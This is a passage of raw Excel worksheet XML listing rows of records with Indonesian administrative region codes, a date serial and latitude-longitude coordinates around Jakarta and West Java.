        <v>1280</v>
      </c>
      <c r="J1198" t="s">
        <v>4402</v>
      </c>
      <c r="L1198" t="s">
        <v>4403</v>
      </c>
      <c r="M1198">
        <v>3173050002</v>
      </c>
      <c r="N1198">
        <v>3173050</v>
      </c>
      <c r="O1198">
        <v>3173</v>
      </c>
      <c r="P1198">
        <v>31</v>
      </c>
      <c r="Q1198" t="s">
        <v>588</v>
      </c>
      <c r="R1198" t="s">
        <v>589</v>
      </c>
      <c r="S1198" t="s">
        <v>62</v>
      </c>
      <c r="T1198" t="s">
        <v>33</v>
      </c>
      <c r="U1198" s="5">
        <v>10687002</v>
      </c>
      <c r="V1198" s="5" t="s">
        <v>15564</v>
      </c>
      <c r="W1198" s="5">
        <v>-617922</v>
      </c>
      <c r="X1198" t="s">
        <v>19346</v>
      </c>
      <c r="Y1198" t="str">
        <f t="shared" si="18"/>
        <v>-6.17922,106.87002</v>
      </c>
    </row>
    <row r="1199" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1199">
        <v>108770</v>
      </c>
      <c r="B1199" s="1">
        <v>43885</v>
      </c>
      <c r="C1199">
        <v>1</v>
      </c>
      <c r="D1199" t="s">
        <v>22</v>
      </c>
      <c r="E1199" t="s">
        <v>23</v>
      </c>
      <c r="F1199" t="s">
        <v>4404</v>
      </c>
      <c r="H1199" t="s">
        <v>26</v>
      </c>
      <c r="I1199" t="s">
        <v>628</v>
      </c>
      <c r="J1199" t="s">
        <v>2627</v>
      </c>
      <c r="L1199" t="s">
        <v>4405</v>
      </c>
      <c r="M1199">
        <v>3275060003</v>
      </c>
      <c r="N1199">
        <v>3275060</v>
      </c>
      <c r="O1199">
        <v>3275</v>
      </c>
      <c r="P1199">
        <v>32</v>
      </c>
      <c r="Q1199" t="s">
        <v>146</v>
      </c>
      <c r="R1199" t="s">
        <v>114</v>
      </c>
      <c r="S1199" t="s">
        <v>41</v>
      </c>
      <c r="T1199" t="s">
        <v>42</v>
      </c>
      <c r="U1199" s="5">
        <v>10698019</v>
      </c>
      <c r="V1199" s="5" t="s">
        <v>15565</v>
      </c>
      <c r="W1199" s="5">
        <v>-622981</v>
      </c>
      <c r="X1199" t="s">
        <v>19347</v>
      </c>
      <c r="Y1199" t="str">
        <f t="shared" si="18"/>
        <v>-6.22981,106.98019</v>
      </c>
    </row>
    <row r="1200" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1200">
        <v>108771</v>
      </c>
      <c r="B1200" s="1">
        <v>43885</v>
      </c>
      <c r="C1200">
        <v>1</v>
      </c>
      <c r="D1200" t="s">
        <v>22</v>
      </c>
      <c r="E1200" t="s">
        <v>23</v>
      </c>
      <c r="F1200" t="s">
        <v>4406</v>
      </c>
      <c r="G1200" t="s">
        <v>4407</v>
      </c>
      <c r="H1200" t="s">
        <v>26</v>
      </c>
      <c r="I1200" t="s">
        <v>2139</v>
      </c>
      <c r="J1200" t="s">
        <v>2627</v>
      </c>
      <c r="L1200" t="s">
        <v>4408</v>
      </c>
      <c r="M1200">
        <v>3275040008</v>
      </c>
      <c r="N1200">
        <v>3275040</v>
      </c>
      <c r="O1200">
        <v>3275</v>
      </c>
      <c r="P1200">
        <v>32</v>
      </c>
      <c r="Q1200" t="s">
        <v>2814</v>
      </c>
      <c r="R1200" t="s">
        <v>100</v>
      </c>
      <c r="S1200" t="s">
        <v>41</v>
      </c>
      <c r="T1200" t="s">
        <v>42</v>
      </c>
      <c r="U1200" s="5">
        <v>10703519</v>
      </c>
      <c r="V1200" s="5" t="s">
        <v>15566</v>
      </c>
      <c r="W1200" s="5">
        <v>-624373</v>
      </c>
      <c r="X1200" t="s">
        <v>19348</v>
      </c>
      <c r="Y1200" t="str">
        <f t="shared" si="18"/>
        <v>-6.24373,107.03519</v>
      </c>
    </row>
    <row r="1201" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1201">
        <v>108772</v>
      </c>
      <c r="B1201" s="1">
        <v>43885</v>
      </c>
      <c r="C1201">
        <v>1</v>
      </c>
      <c r="D1201" t="s">
        <v>22</v>
      </c>
      <c r="E1201" t="s">
        <v>23</v>
      </c>
      <c r="F1201" t="s">
        <v>4409</v>
      </c>
      <c r="H1201" t="s">
        <v>26</v>
      </c>
      <c r="I1201" t="s">
        <v>4410</v>
      </c>
      <c r="J1201" t="s">
        <v>425</v>
      </c>
      <c r="L1201" t="s">
        <v>4411</v>
      </c>
      <c r="M1201">
        <v>3174020006</v>
      </c>
      <c r="N1201">
        <v>3174020</v>
      </c>
      <c r="O1201">
        <v>3174</v>
      </c>
      <c r="P1201">
        <v>31</v>
      </c>
      <c r="Q1201" t="s">
        <v>427</v>
      </c>
      <c r="R1201" t="s">
        <v>31</v>
      </c>
      <c r="S1201" t="s">
        <v>32</v>
      </c>
      <c r="T1201" t="s">
        <v>33</v>
      </c>
      <c r="U1201" s="5">
        <v>10675314</v>
      </c>
      <c r="V1201" s="5" t="s">
        <v>15567</v>
      </c>
      <c r="W1201" s="5">
        <v>-617640</v>
      </c>
      <c r="X1201" t="s">
        <v>19153</v>
      </c>
      <c r="Y1201" t="str">
        <f t="shared" si="18"/>
        <v>-6.17640,106.75314</v>
      </c>
    </row>
    <row r="1202" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1202">
        <v>108773</v>
      </c>
      <c r="B1202" s="1">
        <v>43885</v>
      </c>
      <c r="C1202">
        <v>1</v>
      </c>
      <c r="D1202" t="s">
        <v>22</v>
      </c>
      <c r="E1202" t="s">
        <v>23</v>
      </c>
      <c r="F1202" t="s">
        <v>4412</v>
      </c>
      <c r="G1202" t="s">
        <v>4413</v>
      </c>
      <c r="H1202" t="s">
        <v>26</v>
      </c>
      <c r="I1202" t="s">
        <v>1201</v>
      </c>
      <c r="J1202" t="s">
        <v>4414</v>
      </c>
      <c r="L1202" t="s">
        <v>4415</v>
      </c>
      <c r="M1202">
        <v>3173070002</v>
      </c>
      <c r="N1202">
        <v>3173070</v>
      </c>
      <c r="O1202">
        <v>3173</v>
      </c>
      <c r="P1202">
        <v>31</v>
      </c>
      <c r="Q1202" t="s">
        <v>2710</v>
      </c>
      <c r="R1202" t="s">
        <v>323</v>
      </c>
      <c r="S1202" t="s">
        <v>62</v>
      </c>
      <c r="T1202" t="s">
        <v>33</v>
      </c>
      <c r="U1202" s="5">
        <v>10683996</v>
      </c>
      <c r="V1202" s="5" t="s">
        <v>15568</v>
      </c>
      <c r="W1202" s="5">
        <v>-615185</v>
      </c>
      <c r="X1202" t="s">
        <v>19349</v>
      </c>
      <c r="Y1202" t="str">
        <f t="shared" si="18"/>
        <v>-6.15185,106.83996</v>
      </c>
    </row>
    <row r="1203" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1203">
        <v>108774</v>
      </c>
      <c r="B1203" s="1">
        <v>43885</v>
      </c>
      <c r="C1203">
        <v>1</v>
      </c>
      <c r="D1203" t="s">
        <v>22</v>
      </c>
      <c r="E1203" t="s">
        <v>23</v>
      </c>
      <c r="F1203" t="s">
        <v>4416</v>
      </c>
      <c r="G1203" t="s">
        <v>4417</v>
      </c>
      <c r="H1203" t="s">
        <v>26</v>
      </c>
      <c r="I1203" t="s">
        <v>367</v>
      </c>
      <c r="J1203" t="s">
        <v>2627</v>
      </c>
      <c r="M1203">
        <v>3204160002</v>
      </c>
      <c r="N1203">
        <v>3204160</v>
      </c>
      <c r="O1203">
        <v>3204</v>
      </c>
      <c r="P1203">
        <v>32</v>
      </c>
      <c r="Q1203" t="s">
        <v>4418</v>
      </c>
      <c r="R1203" t="s">
        <v>4419</v>
      </c>
      <c r="S1203" t="s">
        <v>1464</v>
      </c>
      <c r="T1203" t="s">
        <v>42</v>
      </c>
      <c r="U1203" s="5">
        <v>10759666</v>
      </c>
      <c r="V1203" s="5" t="s">
        <v>15569</v>
      </c>
      <c r="W1203" s="5">
        <v>-707023</v>
      </c>
      <c r="X1203" t="s">
        <v>19350</v>
      </c>
      <c r="Y1203" t="str">
        <f t="shared" si="18"/>
        <v>-7.07023,107.59666</v>
      </c>
    </row>
    <row r="1204" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1204">
        <v>108775</v>
      </c>
      <c r="B1204" s="1">
        <v>43885</v>
      </c>
      <c r="C1204">
        <v>1</v>
      </c>
      <c r="D1204" t="s">
        <v>22</v>
      </c>
      <c r="E1204" t="s">
        <v>23</v>
      </c>
      <c r="F1204" t="s">
        <v>4420</v>
      </c>
      <c r="G1204" t="s">
        <v>4421</v>
      </c>
      <c r="H1204" t="s">
        <v>26</v>
      </c>
      <c r="I1204" t="s">
        <v>27</v>
      </c>
      <c r="J1204" t="s">
        <v>2627</v>
      </c>
      <c r="M1204">
        <v>3275050004</v>
      </c>
      <c r="N1204">
        <v>3275050</v>
      </c>
      <c r="O1204">
        <v>3275</v>
      </c>
      <c r="P1204">
        <v>32</v>
      </c>
      <c r="Q1204" t="s">
        <v>4422</v>
      </c>
      <c r="R1204" t="s">
        <v>955</v>
      </c>
      <c r="S1204" t="s">
        <v>41</v>
      </c>
      <c r="T1204" t="s">
        <v>42</v>
      </c>
      <c r="U1204" s="5">
        <v>10699950</v>
      </c>
      <c r="V1204" s="5" t="s">
        <v>15570</v>
      </c>
      <c r="W1204" s="5">
        <v>-624233</v>
      </c>
      <c r="X1204" t="s">
        <v>19351</v>
      </c>
      <c r="Y1204" t="str">
        <f t="shared" si="18"/>
        <v>-6.24233,106.99950</v>
      </c>
    </row>
    <row r="1205" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1205">
        <v>108776</v>
      </c>
      <c r="B1205" s="1">
        <v>43885</v>
      </c>
      <c r="C1205">
        <v>1</v>
      </c>
      <c r="D1205" t="s">
        <v>22</v>
      </c>
      <c r="E1205" t="s">
        <v>23</v>
      </c>
      <c r="F1205" t="s">
        <v>4423</v>
      </c>
      <c r="G1205" t="s">
        <v>4424</v>
      </c>
      <c r="H1205" t="s">
        <v>26</v>
      </c>
      <c r="I1205" t="s">
        <v>166</v>
      </c>
      <c r="J1205" t="s">
        <v>3135</v>
      </c>
      <c r="L1205" t="s">
        <v>4425</v>
      </c>
      <c r="M1205">
        <v>3671021007</v>
      </c>
      <c r="N1205">
        <v>3671021</v>
      </c>
      <c r="O1205">
        <v>3671</v>
      </c>
      <c r="P1205">
        <v>36</v>
      </c>
      <c r="Q1205" t="s">
        <v>454</v>
      </c>
      <c r="R1205" t="s">
        <v>454</v>
      </c>
      <c r="S1205" t="s">
        <v>201</v>
      </c>
      <c r="T1205" t="s">
        <v>171</v>
      </c>
      <c r="U1205" s="5">
        <v>10669474</v>
      </c>
      <c r="V1205" s="5" t="s">
        <v>15571</v>
      </c>
      <c r="W1205" s="5">
        <v>-621631</v>
      </c>
      <c r="X1205" t="s">
        <v>19352</v>
      </c>
      <c r="Y1205" t="str">
        <f t="shared" si="18"/>
        <v>-6.21631,106.69474</v>
      </c>
    </row>
    <row r="1206" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1206">
        <v>108777</v>
      </c>
      <c r="B1206" s="1">
        <v>43885</v>
      </c>
      <c r="C1206">
        <v>1</v>
      </c>
      <c r="D1206" t="s">
        <v>22</v>
      </c>
      <c r="E1206" t="s">
        <v>23</v>
      </c>
      <c r="F1206" t="s">
        <v>4426</v>
      </c>
      <c r="G1206" t="s">
        <v>4427</v>
      </c>
      <c r="H1206" t="s">
        <v>26</v>
      </c>
      <c r="I1206" t="s">
        <v>4428</v>
      </c>
      <c r="J1206" t="s">
        <v>4429</v>
      </c>
      <c r="L1206" t="s">
        <v>4430</v>
      </c>
      <c r="M1206">
        <v>3171070002</v>
      </c>
      <c r="N1206">
        <v>3171070</v>
      </c>
      <c r="O1206">
        <v>3171</v>
      </c>
      <c r="P1206">
        <v>31</v>
      </c>
      <c r="Q1206" t="s">
        <v>2142</v>
      </c>
      <c r="R1206" t="s">
        <v>121</v>
      </c>
      <c r="S1206" t="s">
        <v>108</v>
      </c>
      <c r="T1206" t="s">
        <v>33</v>
      </c>
      <c r="U1206" s="5">
        <v>10682073</v>
      </c>
      <c r="V1206" s="5" t="s">
        <v>15572</v>
      </c>
      <c r="W1206" s="5">
        <v>-624100</v>
      </c>
      <c r="X1206" t="s">
        <v>18834</v>
      </c>
      <c r="Y1206" t="str">
        <f t="shared" si="18"/>
        <v>-6.24100,106.82073</v>
      </c>
    </row>
    <row r="1207" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1207">
        <v>108778</v>
      </c>
      <c r="B1207" s="1">
        <v>43885</v>
      </c>
      <c r="C1207">
        <v>1</v>
      </c>
      <c r="D1207" t="s">
        <v>22</v>
      </c>
      <c r="E1207" t="s">
        <v>23</v>
      </c>
      <c r="F1207" t="s">
        <v>4431</v>
      </c>
      <c r="G1207" t="s">
        <v>4432</v>
      </c>
      <c r="H1207" t="s">
        <v>26</v>
      </c>
      <c r="I1207" t="s">
        <v>4433</v>
      </c>
      <c r="J1207" t="s">
        <v>2627</v>
      </c>
      <c r="L1207" t="s">
        <v>4434</v>
      </c>
      <c r="M1207">
        <v>3275050007</v>
      </c>
      <c r="N1207">
        <v>3275050</v>
      </c>
      <c r="O1207">
        <v>3275</v>
      </c>
      <c r="P1207">
        <v>32</v>
      </c>
      <c r="Q1207" t="s">
        <v>954</v>
      </c>
      <c r="R1207" t="s">
        <v>955</v>
      </c>
      <c r="S1207" t="s">
        <v>41</v>
      </c>
      <c r="T1207" t="s">
        <v>42</v>
      </c>
      <c r="U1207" s="5">
        <v>10698461</v>
      </c>
      <c r="V1207" s="5" t="s">
        <v>15573</v>
      </c>
      <c r="W1207" s="5">
        <v>-624328</v>
      </c>
      <c r="X1207" t="s">
        <v>19353</v>
      </c>
      <c r="Y1207" t="str">
        <f t="shared" si="18"/>
        <v>-6.24328,106.98461</v>
      </c>
    </row>
    <row r="1208" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1208">
        <v>108779</v>
      </c>
      <c r="B1208" s="1">
        <v>43885</v>
      </c>
      <c r="C1208">
        <v>1</v>
      </c>
      <c r="D1208" t="s">
        <v>22</v>
      </c>
      <c r="E1208" t="s">
        <v>23</v>
      </c>
      <c r="F1208" t="s">
        <v>4435</v>
      </c>
      <c r="H1208" t="s">
        <v>26</v>
      </c>
      <c r="I1208" t="s">
        <v>4436</v>
      </c>
      <c r="J1208" t="s">
        <v>4437</v>
      </c>
      <c r="L1208" t="s">
        <v>4438</v>
      </c>
      <c r="M1208">
        <v>3172090005</v>
      </c>
      <c r="N1208">
        <v>3172090</v>
      </c>
      <c r="O1208">
        <v>3172</v>
      </c>
      <c r="P1208">
        <v>31</v>
      </c>
      <c r="Q1208" t="s">
        <v>2749</v>
      </c>
      <c r="R1208" t="s">
        <v>890</v>
      </c>
      <c r="S1208" t="s">
        <v>49</v>
      </c>
      <c r="T1208" t="s">
        <v>33</v>
      </c>
      <c r="U1208" s="5">
        <v>10689090</v>
      </c>
      <c r="V1208" s="5" t="s">
        <v>15574</v>
      </c>
      <c r="W1208" s="5">
        <v>-618936</v>
      </c>
      <c r="X1208" t="s">
        <v>19354</v>
      </c>
      <c r="Y1208" t="str">
        <f t="shared" si="18"/>
        <v>-6.18936,106.89090</v>
      </c>
    </row>
    <row r="1209" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1209">
        <v>108780</v>
      </c>
      <c r="B1209" s="1">
        <v>43885</v>
      </c>
      <c r="C1209">
        <v>1</v>
      </c>
      <c r="D1209" t="s">
        <v>22</v>
      </c>
      <c r="E1209" t="s">
        <v>23</v>
      </c>
      <c r="F1209" t="s">
        <v>4439</v>
      </c>
      <c r="G1209" t="s">
        <v>4440</v>
      </c>
      <c r="H1209" t="s">
        <v>26</v>
      </c>
      <c r="I1209" t="s">
        <v>4441</v>
      </c>
      <c r="J1209" t="s">
        <v>4442</v>
      </c>
      <c r="L1209" t="s">
        <v>4443</v>
      </c>
      <c r="M1209">
        <v>3173050001</v>
      </c>
      <c r="N1209">
        <v>3173050</v>
      </c>
      <c r="O1209">
        <v>3173</v>
      </c>
      <c r="P1209">
        <v>31</v>
      </c>
      <c r="Q1209" t="s">
        <v>2790</v>
      </c>
      <c r="R1209" t="s">
        <v>589</v>
      </c>
      <c r="S1209" t="s">
        <v>62</v>
      </c>
      <c r="T1209" t="s">
        <v>33</v>
      </c>
      <c r="U1209" s="5">
        <v>10687101</v>
      </c>
      <c r="V1209" s="5" t="s">
        <v>15575</v>
      </c>
      <c r="W1209" s="5">
        <v>-619090</v>
      </c>
      <c r="X1209" t="s">
        <v>19355</v>
      </c>
      <c r="Y1209" t="str">
        <f t="shared" si="18"/>
        <v>-6.19090,106.87101</v>
      </c>
    </row>
    <row r="1210" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1210">
        <v>108781</v>
      </c>
      <c r="B1210" s="1">
        <v>43885</v>
      </c>
      <c r="C1210">
        <v>1</v>
      </c>
      <c r="D1210" t="s">
        <v>22</v>
      </c>
      <c r="E1210" t="s">
        <v>23</v>
      </c>
      <c r="F1210" t="s">
        <v>4444</v>
      </c>
      <c r="G1210" t="s">
        <v>4445</v>
      </c>
      <c r="H1210" t="s">
        <v>26</v>
      </c>
      <c r="I1210" t="s">
        <v>1513</v>
      </c>
      <c r="J1210" t="s">
        <v>2762</v>
      </c>
      <c r="L1210" t="s">
        <v>4446</v>
      </c>
      <c r="M1210">
        <v>3173050002</v>
      </c>
      <c r="N1210">
        <v>3173050</v>
      </c>
      <c r="O1210">
        <v>3173</v>
      </c>
      <c r="P1210">
        <v>31</v>
      </c>
      <c r="Q1210" t="s">
        <v>588</v>
      </c>
      <c r="R1210" t="s">
        <v>589</v>
      </c>
      <c r="S1210" t="s">
        <v>62</v>
      </c>
      <c r="T1210" t="s">
        <v>33</v>
      </c>
      <c r="U1210" s="5">
        <v>10687227</v>
      </c>
      <c r="V1210" s="5" t="s">
        <v>15576</v>
      </c>
      <c r="W1210" s="5">
        <v>-617858</v>
      </c>
      <c r="X1210" t="s">
        <v>19356</v>
      </c>
      <c r="Y1210" t="str">
        <f t="shared" si="18"/>
        <v>-6.17858,106.87227</v>
      </c>
    </row>
    <row r="1211" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1211">
        <v>108782</v>
      </c>
      <c r="B1211" s="1">
        <v>43885</v>
      </c>
      <c r="C1211">
        <v>1</v>
      </c>
      <c r="D1211" t="s">
        <v>22</v>
      </c>
      <c r="E1211" t="s">
        <v>23</v>
      </c>
      <c r="F1211" t="s">
        <v>4447</v>
      </c>
      <c r="G1211" t="s">
        <v>4448</v>
      </c>
      <c r="H1211" t="s">
        <v>26</v>
      </c>
      <c r="I1211" t="s">
        <v>492</v>
      </c>
      <c r="J1211" t="s">
        <v>4449</v>
      </c>
      <c r="L1211" t="s">
        <v>250</v>
      </c>
      <c r="M1211">
        <v>3174060004</v>
      </c>
      <c r="N1211">
        <v>3174060</v>
      </c>
      <c r="O1211">
        <v>3174</v>
      </c>
      <c r="P1211">
        <v>31</v>
      </c>
      <c r="Q1211" t="s">
        <v>4450</v>
      </c>
      <c r="R1211" t="s">
        <v>1762</v>
      </c>
      <c r="S1211" t="s">
        <v>32</v>
      </c>
      <c r="T1211" t="s">
        <v>33</v>
      </c>
      <c r="U1211" s="5">
        <v>10682463</v>
      </c>
      <c r="V1211" s="5" t="s">
        <v>15577</v>
      </c>
      <c r="W1211" s="5">
        <v>-614543</v>
      </c>
      <c r="X1211" t="s">
        <v>19357</v>
      </c>
      <c r="Y1211" t="str">
        <f t="shared" si="18"/>
        <v>-6.14543,106.82463</v>
      </c>
    </row>
    <row r="1212" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1212">
        <v>108783</v>
      </c>
      <c r="B1212" s="1">
        <v>43885</v>
      </c>
      <c r="C1212">
        <v>1</v>
      </c>
      <c r="D1212" t="s">
        <v>22</v>
      </c>
      <c r="E1212" t="s">
        <v>23</v>
      </c>
      <c r="F1212" t="s">
        <v>4451</v>
      </c>
      <c r="G1212" t="s">
        <v>4452</v>
      </c>
      <c r="H1212" t="s">
        <v>26</v>
      </c>
      <c r="I1212" t="s">
        <v>4153</v>
      </c>
      <c r="J1212" t="s">
        <v>3515</v>
      </c>
      <c r="L1212" t="s">
        <v>4453</v>
      </c>
      <c r="M1212">
        <v>3172090004</v>
      </c>
      <c r="N1212">
        <v>3172090</v>
      </c>
      <c r="O1212">
        <v>3172</v>
      </c>
      <c r="P1212">
        <v>31</v>
      </c>
      <c r="Q1212" t="s">
        <v>889</v>
      </c>
      <c r="R1212" t="s">
        <v>890</v>
      </c>
      <c r="S1212" t="s">
        <v>49</v>
      </c>
      <c r="T1212" t="s">
        <v>33</v>
      </c>
      <c r="U1212" s="5">
        <v>10689195</v>
      </c>
      <c r="V1212" s="5" t="s">
        <v>15578</v>
      </c>
      <c r="W1212" s="5">
        <v>-620038</v>
      </c>
      <c r="X1212" t="s">
        <v>19358</v>
      </c>
      <c r="Y1212" t="str">
        <f t="shared" si="18"/>
        <v>-6.20038,106.89195</v>
      </c>
    </row>
    <row r="1213" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1213">
        <v>108784</v>
      </c>
      <c r="B1213" s="1">
        <v>43885</v>
      </c>
      <c r="C1213">
        <v>1</v>
      </c>
      <c r="D1213" t="s">
        <v>22</v>
      </c>
      <c r="E1213" t="s">
        <v>23</v>
      </c>
      <c r="F1213" t="s">
        <v>4454</v>
      </c>
      <c r="G1213" t="s">
        <v>4455</v>
      </c>
      <c r="H1213" t="s">
        <v>26</v>
      </c>
      <c r="I1213" t="s">
        <v>1490</v>
      </c>
      <c r="J1213" t="s">
        <v>3379</v>
      </c>
      <c r="L1213" t="s">
        <v>4456</v>
      </c>
      <c r="M1213">
        <v>3173040001</v>
      </c>
      <c r="N1213">
        <v>3173040</v>
      </c>
      <c r="O1213">
        <v>3173</v>
      </c>
      <c r="P1213">
        <v>31</v>
      </c>
      <c r="Q1213" t="s">
        <v>1598</v>
      </c>
      <c r="R1213" t="s">
        <v>1598</v>
      </c>
      <c r="S1213" t="s">
        <v>62</v>
      </c>
      <c r="T1213" t="s">
        <v>33</v>
      </c>
      <c r="U1213" s="5">
        <v>10686073</v>
      </c>
      <c r="V1213" s="5" t="s">
        <v>15579</v>
      </c>
      <c r="W1213" s="5">
        <v>-618674</v>
      </c>
      <c r="X1213" t="s">
        <v>19359</v>
      </c>
      <c r="Y1213" t="str">
        <f t="shared" si="18"/>
        <v>-6.18674,106.86073</v>
      </c>
    </row>
    <row r="1214" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1214">
        <v>108785</v>
      </c>
      <c r="B1214" s="1">
        <v>43885</v>
      </c>
      <c r="C1214">
        <v>1</v>
      </c>
      <c r="D1214" t="s">
        <v>22</v>
      </c>
      <c r="E1214" t="s">
        <v>23</v>
      </c>
      <c r="F1214" t="s">
        <v>4457</v>
      </c>
      <c r="G1214" t="s">
        <v>4458</v>
      </c>
      <c r="H1214" t="s">
        <v>26</v>
      </c>
      <c r="I1214" t="s">
        <v>753</v>
      </c>
      <c r="J1214" t="s">
        <v>4459</v>
      </c>
      <c r="L1214" t="s">
        <v>4460</v>
      </c>
      <c r="M1214">
        <v>3172040003</v>
      </c>
      <c r="N1214">
        <v>3172040</v>
      </c>
      <c r="O1214">
        <v>3172</v>
      </c>
      <c r="P1214">
        <v>31</v>
      </c>
      <c r="Q1214" t="s">
        <v>552</v>
      </c>
      <c r="R1214" t="s">
        <v>281</v>
      </c>
      <c r="S1214" t="s">
        <v>49</v>
      </c>
      <c r="T1214" t="s">
        <v>33</v>
      </c>
      <c r="U1214" s="5">
        <v>10688117</v>
      </c>
      <c r="V1214" s="5" t="s">
        <v>15580</v>
      </c>
      <c r="W1214" s="5">
        <v>-625191</v>
      </c>
      <c r="X1214" t="s">
        <v>19360</v>
      </c>
      <c r="Y1214" t="str">
        <f t="shared" si="18"/>
        <v>-6.25191,106.88117</v>
      </c>
    </row>
    <row r="1215" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1215">
        <v>108786</v>
      </c>
      <c r="B1215" s="1">
        <v>43885</v>
      </c>
      <c r="C1215">
        <v>1</v>
      </c>
      <c r="D1215" t="s">
        <v>22</v>
      </c>
      <c r="E1215" t="s">
        <v>23</v>
      </c>
      <c r="F1215" t="s">
        <v>4461</v>
      </c>
      <c r="H1215" t="s">
        <v>26</v>
      </c>
      <c r="I1215" t="s">
        <v>290</v>
      </c>
      <c r="J1215" t="s">
        <v>3511</v>
      </c>
      <c r="L1215" t="s">
        <v>4462</v>
      </c>
      <c r="M1215">
        <v>3175050003</v>
      </c>
      <c r="N1215">
        <v>3175050</v>
      </c>
      <c r="O1215">
        <v>3175</v>
      </c>
      <c r="P1215">
        <v>31</v>
      </c>
      <c r="Q1215" t="s">
        <v>1740</v>
      </c>
      <c r="R1215" t="s">
        <v>1013</v>
      </c>
      <c r="S1215" t="s">
        <v>547</v>
      </c>
      <c r="T1215" t="s">
        <v>33</v>
      </c>
      <c r="U1215" s="5">
        <v>10690985</v>
      </c>
      <c r="V1215" s="5" t="s">
        <v>15581</v>
      </c>
      <c r="W1215" s="5">
        <v>-617083</v>
      </c>
      <c r="X1215" t="s">
        <v>19361</v>
      </c>
      <c r="Y1215" t="str">
        <f t="shared" si="18"/>
        <v>-6.17083,106.90985</v>
      </c>
    </row>
    <row r="1216" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1216">
        <v>108787</v>
      </c>
      <c r="B1216" s="1">
        <v>43885</v>
      </c>
      <c r="C1216">
        <v>1</v>
      </c>
      <c r="D1216" t="s">
        <v>22</v>
      </c>
      <c r="E1216" t="s">
        <v>23</v>
      </c>
      <c r="F1216" t="s">
        <v>4463</v>
      </c>
      <c r="G1216" t="s">
        <v>4464</v>
      </c>
      <c r="H1216" t="s">
        <v>26</v>
      </c>
      <c r="I1216" t="s">
        <v>1991</v>
      </c>
      <c r="J1216" t="s">
        <v>2627</v>
      </c>
      <c r="L1216" t="s">
        <v>4465</v>
      </c>
      <c r="M1216">
        <v>3275031003</v>
      </c>
      <c r="N1216">
        <v>3275031</v>
      </c>
      <c r="O1216">
        <v>3275</v>
      </c>
      <c r="P1216">
        <v>32</v>
      </c>
      <c r="Q1216" t="s">
        <v>988</v>
      </c>
      <c r="R1216" t="s">
        <v>574</v>
      </c>
      <c r="S1216" t="s">
        <v>41</v>
      </c>
      <c r="T1216" t="s">
        <v>42</v>
      </c>
      <c r="U1216" s="5">
        <v>10702347</v>
      </c>
      <c r="V1216" s="5" t="s">
        <v>15582</v>
      </c>
      <c r="W1216" s="5">
        <v>-630027</v>
      </c>
      <c r="X1216" t="s">
        <v>19362</v>
      </c>
      <c r="Y1216" t="str">
        <f t="shared" si="18"/>
        <v>-6.30027,107.02347</v>
      </c>
    </row>
    <row r="1217" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1217">
        <v>108788</v>
      </c>
      <c r="B1217" s="1">
        <v>43885</v>
      </c>
      <c r="C1217">
        <v>1</v>
      </c>
      <c r="D1217" t="s">
        <v>22</v>
      </c>
      <c r="E1217" t="s">
        <v>23</v>
      </c>
      <c r="F1217" t="s">
        <v>4466</v>
      </c>
      <c r="G1217" t="s">
        <v>4467</v>
      </c>
      <c r="H1217" t="s">
        <v>26</v>
      </c>
      <c r="I1217" t="s">
        <v>1194</v>
      </c>
      <c r="J1217" t="s">
        <v>2627</v>
      </c>
      <c r="L1217" t="s">
        <v>4468</v>
      </c>
      <c r="M1217">
        <v>3275031004</v>
      </c>
      <c r="N1217">
        <v>3275031</v>
      </c>
      <c r="O1217">
        <v>3275</v>
      </c>
      <c r="P1217">
        <v>32</v>
      </c>
      <c r="Q1217" t="s">
        <v>4469</v>
      </c>
      <c r="R1217" t="s">
        <v>574</v>
      </c>
      <c r="S1217" t="s">
        <v>41</v>
      </c>
      <c r="T1217" t="s">
        <v>42</v>
      </c>
      <c r="U1217" s="5">
        <v>10701354</v>
      </c>
      <c r="V1217" s="5" t="s">
        <v>15583</v>
      </c>
      <c r="W1217" s="5">
        <v>-629111</v>
      </c>
      <c r="X1217" t="s">
        <v>19363</v>
      </c>
      <c r="Y1217" t="str">
        <f t="shared" si="18"/>
        <v>-6.29111,107.01354</v>
      </c>
    </row>
    <row r="1218" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1218">
        <v>108789</v>
      </c>
      <c r="B1218" s="1">
        <v>43885</v>
      </c>
      <c r="C1218">
        <v>1</v>
      </c>
      <c r="D1218" t="s">
        <v>22</v>
      </c>
      <c r="E1218" t="s">
        <v>23</v>
      </c>
      <c r="F1218" t="s">
        <v>4470</v>
      </c>
      <c r="G1218" t="s">
        <v>4471</v>
      </c>
      <c r="H1218" t="s">
        <v>26</v>
      </c>
      <c r="I1218" t="s">
        <v>4472</v>
      </c>
      <c r="J1218" t="s">
        <v>1879</v>
      </c>
      <c r="M1218">
        <v>3173080003</v>
      </c>
      <c r="N1218">
        <v>3173080</v>
      </c>
      <c r="O1218">
        <v>3173</v>
      </c>
      <c r="P1218">
        <v>31</v>
      </c>
      <c r="Q1218" t="s">
        <v>157</v>
      </c>
      <c r="R1218" t="s">
        <v>157</v>
      </c>
      <c r="S1218" t="s">
        <v>62</v>
      </c>
      <c r="T1218" t="s">
        <v>33</v>
      </c>
      <c r="U1218" s="5">
        <v>10682284</v>
      </c>
      <c r="V1218" s="5" t="s">
        <v>15584</v>
      </c>
      <c r="W1218" s="5">
        <v>-617217</v>
      </c>
      <c r="X1218" t="s">
        <v>19364</v>
      </c>
      <c r="Y1218" t="str">
        <f t="shared" si="18"/>
        <v>-6.17217,106.82284</v>
      </c>
    </row>
    <row r="1219" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1219">
        <v>108790</v>
      </c>
